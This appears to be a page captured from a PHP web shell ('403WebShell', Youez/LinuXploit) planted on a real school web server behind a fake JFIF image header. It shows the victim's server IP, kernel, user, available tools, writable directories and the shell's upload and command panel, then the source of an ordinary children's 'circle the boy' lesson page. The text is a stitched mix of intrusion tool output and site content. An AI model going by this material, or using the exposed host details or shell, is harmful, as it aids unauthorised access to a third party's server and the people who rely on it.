????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 18.226.169.66
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/appsrv.astacus.se/apps/school/www_old3/Html/LevelB/Category2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/appsrv.astacus.se/apps/school/www_old3/Html/LevelB/Category2/LevelBCat2Lesson17.html
<!DOCTYPE html>
<html>
    <head>
        <title>Circle boys</title>
        
        <script type="text/javascript" src="../../../js/allScriptsForLessonsHtml.js"></script>
        
            <style type="text/css">
                
                svg
                {
                    position: absolute;
                    background-color: transparent;
                }
            
            </style>            
            
            <script>
                function page_preLoad()
                {
                    shared_setDeviceTypeLevelCategoryLastLesson(Level.B, Category.No2);
                    
                    shared_set_tblMainiPadBodyWidthHeight('id_tblMainiPadBody', 'id_meta');
                    
                    shared_setHeaderTable('id_tblHeader', shared_title_page, shared_getSubTitle(Level.B, Category.No2, 17), true, true);
                    shared_setFooterTable('id_tblFooter', true, true, true, true, true);
                    
                    var ids_headings = ['id_td_heading1', 'id_td_heading2', 'id_td_heading3'];
                    
                    shared_adjust_fontSize_for_ids_all_devices(ids_headings, 80);
                    
                    var id_tables_array = ['id_table1', 'id_table2', 'id_table3'];
                    shared_border_collapse_for_tables_except_android(id_tables_array);
                }
            
                function page_onLoad()
                {
                    setAllSvgsWidthHeightAndPositionFromTds();
                    
                    setAllEllipseStyles();
                }
            
                function setAllSvgsWidthHeightAndPositionFromTds()
                {
                    var nTds = 5;
                    
                    for (var nthSet = 1; nthSet <= 3; nthSet++)
                    {
                        for (var nthTd = 1; nthTd <= nTds; nthTd++)
                        {
                            shared_svg_setSvgWidthHeightAndPositionFromTd('id_td' + nthTd + 'Set' + nthSet, 'id_svg' + nthTd + 'Set' + nthSet);
                        }
                    }
                }
                
                function setAllEllipseStyles()
                {
                    var allEllipseIdsArray = getAll3SetsEllipseIdsArray();
                    
                    for (var indexEllipse = 0; indexEllipse < allEllipseIdsArray.length; indexEllipse++)
                    {
                        var id_ellipse = allEllipseIdsArray[indexEllipse];
                        
                        shared_svg_setEllipseStyle(id_ellipse);
                    }
                }
                
                function getAll3SetsEllipseIdsArray()
                {
                    var allEllipseIdsArray = new Array();
                    
                    for (var nthSet = 1; nthSet <= 3; nthSet++)
                    {
                        for (var nthEllipse = 1; nthEllipse <= 5; nthEllipse++)
                        {
                            allEllipseIdsArray.push('id_ellipse' + nthEllipse + 'Set' + nthSet);
                        }
                    }
                    
                    return (allEllipseIdsArray);
                }
            
                function ellipse_click(id_ellipse)
                {
                    var set1IdsArray = ['id_ellipse1Set1', 'id_ellipse2Set1', 'id_ellipse3Set1', 'id_ellipse4Set1', 'id_ellipse5Set1'];
                    var set2IdsArray = ['id_ellipse1Set2', 'id_ellipse2Set2', 'id_ellipse3Set2', 'id_ellipse4Set2', 'id_ellipse5Set2'];
                    var set3IdsArray = ['id_ellipse1Set3', 'id_ellipse2Set3', 'id_ellipse3Set3', 'id_ellipse4Set3', 'id_ellipse5Set3'];
                    
                    var allGroupsIdsArrayArray = [set1IdsArray, set2IdsArray, set3IdsArray];
                    
                    shared_svg_showHideEllipsesMultipleFor1Td(id_ellipse, allGroupsIdsArrayArray);
                }
            
                function btnValidate_click()
                {
                    var allEllipseIdsArray = getAll3SetsEllipseIdsArray();
                    
                    var correctEllipseIdsArray = ['id_ellipse1Set1', 'id_ellipse2Set2', 'id_ellipse3Set3'];
                    
                    var nCorrectEllipses = shared_svg_validateEllipses(allEllipseIdsArray, correctEllipseIdsArray);
                    
                    if (nCorrectEllipses == 3)
                    {
                        shared_show_claps_animation('shared_id_div_claps_image');
                    }
                }
            
                function btnPrevious_click()
                {
                    window.location = 'LevelBCat2Lesson16.html';
                }
            
                function btnNext_click()
                {
                    window.location = 'LevelBCat2Lesson18.html';
                }
                
                function btnHome_click()
                {
                    shared_btnHomeCategories_click('LevelB');
                }
            
            </script>
        </head>
    
    <body onLoad="page_onLoad()">
        <div id="shared_id_div_claps_image">
        </div>
        
        <table id="id_tblMainiPadBody" border="1" cellspacing="0" cellpadding="0">
            <tr height="8%">
                <td>
                    <div id="id_tblHeader"></div>
                </td>
            </tr>
            <tr height="*" data-role="page"> <!-- for swiping left and right especially for Android device -->
                <td>
                    <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                        <tr>
                            <td>
                                <table width="100%" height="100%" border="0px" cellspacing="0" cellpadding="2%">
                                    <tr height="33%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table id="id_table1" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                                <tr height="20%">
                                                    <td id="id_td_heading1" class="shared_style_options_blue_24px_bold">1. Circle the <span style="color:red">first and fat</span> boy:
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td1Set1" width="20%" align="center">
                                                                    <img id="id_imgFatBoy1Set1" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy1.png" width="40%" height"auto">
                                                                    <svg id="id_svg1Set1" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse1Set1" cx="51%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td2Set1" width="20%" align="center">
                                                                    <img id="id_imgFatBoy2Set1" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy2.png" width="40%" height"auto">
                                                                    <svg id="id_svg2Set1" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse2Set1" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td3Set1" width="20%" align="center">
                                                                    <img id="id_imgFatBoy3Set1" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy3.png" width="25%" height"auto">
                                                                    <svg id="id_svg3Set1" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse3Set1" cx="48%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td4Set1" width="20%" style="text-align:center" align="center">
                                                                    <img id="id_imgFatBoy4Set1" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy4.png" width="25%" height"auto">
                                                                    <svg id="id_svg4Set1" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse4Set1" cx="48%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td5Set1" width="*" style="text-align:center" align="center">
                                                                    <img id="id_imgFatBoy5Set1" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy5.png" width="25%" height"auto">
                                                                    <svg id="id_svg5Set1" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse5Set1" cx="48%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="33%">
                                        <td align="center" style="padding-bottom: 0px">
                                            <table id="id_table2" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                                <tr height="20%">
                                                    <td id="id_td_heading2" class="shared_style_options_blue_24px_bold" style="border-bottom:none">2. Circle the <span style="color:red">second</span> boy:
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td1Set2" width="20%" style="text-align:center">
                                                                    <img id="id_imgFatBoy1Set2" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy1.png" width="40%" height"auto">
                                                                    <svg id="id_svg1Set2" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse1Set2" cx="52%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td2Set2" width="20%" style="text-align:center" align="center">
                                                                    <img id="id_imgFatBoy2Set2" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy2.png" width="40%" height"auto">
                                                                    <svg id="id_svg2Set2" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse2Set2" cx="52%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td3Set2" width="20%" style="text-align:center">
                                                                    <img id="id_imgFatBoy3Set2" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy3.png" width="25%" height"auto">
                                                                    <svg id="id_svg3Set2" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse3Set2" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td4Set2" width="20%" style="text-align:center" align="center">
                                                                    <img id="id_imgFatBoy4Set2" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy4.png" width="25%" height"auto">
                                                                    <svg id="id_svg4Set2" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse4Set2" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td5Set2" width="*" style="text-align:center" align="center">
                                                                    <img id="id_imgFatBoy5Set2" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy5.png" width="25%" height"auto">
                                                                    <svg id="id_svg5Set2" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse5Set2" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                    <tr height="*">
                                        <td align="center">
                                            <table id="id_table3" id="id_table3" width="100%" height="100%" border="1" cellspacing="0" cellpadding="0">
                                                <tr height="20%">
                                                    <td id="id_td_heading3" class="shared_style_options_blue_24px_bold">3. Circle the <span style="color:red">third</span> boy:
                                                    </td>
                                                </tr>
                                                <tr>
                                                    <td>
                                                        <table width="100%" height="100%" border="0" cellspacing="0" cellpadding="0">
                                                            <tr>
                                                                <td id="id_td1Set3" width="20%" style="text-align:center">
                                                                    <img id="id_imgFatBoy1Set3" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy1.png" width="40%" height"auto">
                                                                    <svg id="id_svg1Set3" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse1Set3" cx="52%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td2Set3" width="20%" style="text-align:center" align="center">
                                                                    <img id="id_imgFatBoy2Set3" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy2.png" width="40%" height"auto">
                                                                    <svg id="id_svg2Set3" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse2Set3" cx="52%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td3Set3" width="20%" style="text-align:center">
                                                                    <img id="id_imgFatBoy3Set3" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy3.png" width="25%" height"auto">
                                                                    <svg id="id_svg3Set3" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse3Set3" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td4Set3" width="20%" style="text-align:center" align="center">
                                                                    <img id="id_imgFatBoy4Set3" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy4.png" width="25%" height"auto">
                                                                    <svg id="id_svg4Set3" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse4Set3" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                                <td id="id_td5Set3" width="*" style="text-align:center" align="center">
                                                                    <img id="id_imgFatBoy5Set3" src="../../../img/LevelB/Category2/LevelBCat2Lesson17/fatBoy5.png" width="25%" height"auto">
                                                                    <svg id="id_svg5Set3" style="visibility: hidden">
                                                                        <ellipse id="id_ellipse5Set3" cx="50%" cy="51%" rx="22%" ry="35%"/>
                                                                    </svg>
                                                                </td>
                                                            </tr>
                                                        </table>
                                                    </td>
                                                </tr>
                                            </table>
                                        </td>
                                    </tr>
                                </table>
                            </td>
                        </tr>
                    </table>
                </td>
            </tr>
            <tr height="8%">
                <td>
                    <div id="id_tblFooter"></div>
                </td>
            </tr>
        </table>
        <script>
            page_preLoad();
        </script>
    </body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit